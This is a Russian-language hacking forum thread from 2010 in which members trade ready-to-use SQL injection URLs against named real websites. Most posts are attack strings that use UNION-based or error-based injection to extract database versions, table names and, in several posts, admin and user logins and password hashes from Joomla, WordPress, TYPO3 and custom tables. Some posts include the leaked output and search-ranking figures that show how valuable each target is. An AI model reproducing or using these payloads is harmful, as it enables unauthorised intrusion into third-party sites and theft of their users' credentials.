SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.artelstroy.com/index.php?house=-1170969905+union+select+1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5+--+

    4.0.27-log : watcher@localhost : lehins : pc-linux-gnu

    http://www.artelrb.ru/?id=23&n=-79+union+select+1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6+--&subaction=detail&lang=

    4.0.27-log [email protected] vh27760 pc-linux-gnu
     
    #13201 AC//DC, 10 Oct 2010
    Last edited: 10 Oct 2010
  2. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.baranltd.com/urunler.php?tur=urun&uid=153+and+1=2+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a,id,kadi,adsoy,bilgi,ip,songir,expr,sifre))),7,8,9,10+from+kg--
     
    #13202 Gemini12, 10 Oct 2010
    Last edited by a moderator: 10 Oct 2010
  3. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    http://www.mkb10.ru/?class=5&bloc=65&diag=3015+and(1=2)+union+select+version()
    MySQL 5.0.90
    тИЦ 10 PR 2
     
    #13203 Irdis, 10 Oct 2010
    Last edited: 10 Oct 2010
  4. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.posscript.ru/index.php?id=2+and+1=2+union+select+1,version(),3,4+--+

    Очень странная скуля...
     
    2 people like this.
  5. Linkus

    Linkus Member

    Joined:
    20 Dec 2008
    Messages:
    168
    Likes Received:
    15
    Reputations:
    -1
    Code:
    http://www.carkitinc.com/carkit2.php?id=-7+UNION+SELECT+1,2,3,concat_ws%280x3a3a,id,Name,Password%29,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+password+LIMIT+0,1+--+
     
    1 person likes this.
  6. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://minpraud.by/news.php?id=2579+and+1=0+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+


    http://www.ranak.by/plus/viewrp.php?id=5297+and+1=0+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14+--+

    http://www.ssangyong.by/ru/pages/index.php?id=268+and+1=0+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x7373616e67796f6e5f6d61696e+--+

    http://www.nastgaz.by/news.php?id=450+and+1=0+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--+&current_date=2010-10-07

    http://www.minpraud.by/catalog.php?id=4751+and+1=0+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+&current_date=2010-10-09

    http://kosmos95.by/index.php?pageid=45+and+1=0+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--++#maintext


    http://www.zaslaue.by/news.php?id=4+and+1=0+union+select+1,2,3,4,5,6,7,group_concat(table_name+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database()--+&lang=be

    http://www.byketiki.by/catalog.php?id=33+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema=database()+--+

    http://www.smarttech.by/index.php?id=6+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--+

    http://www.polimersin.by/index.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--+

    http://www.minskie-okna.ru/page.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,2+--+

    http://znakbuh.ru/index.php?id=4+and+1=0+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20

    http://www.asotrabel.by/news.php?id=17+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--+

    http://sutkiminsk.by/catalog.php?rub=18+and+1=0+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=database()+--+&lang=ru
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Не много джумлы:

    http://www.ushandball.org/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat%28username,0x3a,pa ss word%29,0,0,0,0,0,0,0,0/**/from/**/jos_users

    PR 5 Cy 10

    http://www.flowershow.ru/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users

    PR 4 Cy 240

    http://www.kadetstvo.info/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users

    PR 2 Cy 100


    http://www.vepsles.spb.ru/veps/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users

    PR 5 Cy 40
     
    1 person likes this.
  8. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.vip-premier.ru/inside.php?action=statia&id=6740&pid=554+and+1=0+union+select+1,2,group_concat(table_name+separator+0x3c62723e),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ : 100

    http://www.coaching-report.de/index.php?id=359+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat(kennung,char(58),vorname,char(58),nachname,char(58),g_mail,char(58),passwort,char(58),g_firma,char(58),g_strasse,char(58),g_ort,char(58),g_plz)+from+op4_admin+limit+0,1),1,64),floor(rand(0)*2)))
    PR: 5

    http://www.metal1.info/news/news.php?id=11061'+and+1=0+union+select+version()+--+

    ТИЦ : 10 PR: 4


    http://www.hortinews.com/news.php?id=22627'+and+1=0+UnIon+selECt+1,2,3,4,5,group_concat(table_name+separator+'<br>'),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x686f7274696e657773+--+
    PR: 3
     
    #13208 tracy, 11 Oct 2010
    Last edited: 11 Oct 2010
    1 person likes this.
  9. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Спутниковые технологии Охранные системы

    http://www.vgp.ru/?page=main_menu&id=-17+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6,7+--

    5.0.90 : [email protected] : b17215_vgp : portbld-freebsd8.1
     
  10. grably

    grably New Member

    Joined:
    6 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    http://www.setyan.ru/index.php?CID=24+and+1=0+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10+from+information_schema.tables+where+table_schema=database%28%29+--+
     
  11. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    вроде не боян
    http://prideatwork.org/page.php?id=5+and+1=0+union+select+concat(username,0x3a,password),2+from+jos_users+--+
    результат в исходнике
    <title></title>

    http://www.cadefoundation.org/page.php?id=4+and+1=0+union+select+1,user(),3,4,5+--+
     
    #13211 Kusto, 12 Oct 2010
    Last edited by a moderator: 13 Oct 2010
    1 person likes this.
  12. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.sevlievo.net/bg/news/news.php?id=571+and+1=0+union+select+1,version(),3+--+
    4.1.22-log
    ТИЦ : 10 PR: 4
     
  13. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.shalomtv.tv/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube

    дерзайте,в админку правда не могу зайти
     
  14. grably

    grably New Member

    Joined:
    6 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    http://www.build.kz/?page=inc/tov&subcid=1&cid=2&fidlist=136-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11--
    http://www.futerovka.ru/?cid=cl&cl=13-999.9+union+select+1,version%28%29,3,4,5,6,7,8--
     
    #13214 grably, 12 Oct 2010
    Last edited by a moderator: 13 Oct 2010
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    wciom.ru тИЦ—3300 PR—6
    Code:
    http://wciom.ru/biblioteka/zhurnal-monitoring/arkhiv/six-ten/index.php?id=195&uid=-13887+union+select+1,2,3,group_concat(concat_ws(0x3a3a,username,password))+from+wciom_typo3.fe_users+--+
     
    2 people like this.
  16. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Еще вордпресс:

    http://www.pam93.info/actu.php?id=-9999999+union+select+0,1,2,3,concat%28user_login,0x3a,user_pa ss,0x3a,user_email%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
    PR 6

    З.Ы. Сервак виндовый:)
     
    #13216 z0mbyak, 14 Oct 2010
    Last edited: 14 Oct 2010
  17. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7+--

    5.0.75-log [email protected] srv19722_db portbld-freebsd7.0

    http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat(name,0x20,password),3,4,5,6,7+from+admins--
     
  18. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    http://www.begamer.ru/content.php?p=2&catId=11&id=-199'+union+select+1,2,3,4,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
  19. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.phoenixrostov.ru/topics/topic/?pid=8+and+1=0+union+Select+version()+--+
    4.1.20-log

    ТИЦ : 160 PR: 5


    http://www.officefile.ru/news_detail.php?id=872'+and+1=0+union+select+1,2,3,version(),5,6,7,8,9,10,11+--+
    4.1.20-log

    ТИЦ : 140
     
    #13219 tracy, 14 Oct 2010
    Last edited: 14 Oct 2010
    1 person likes this.
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://www.touringcartimes.com/news.php?id=4326'%20and%201=0%20union%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156--%201
     
    1 person likes this.
Thread Status:
Not open for further replies.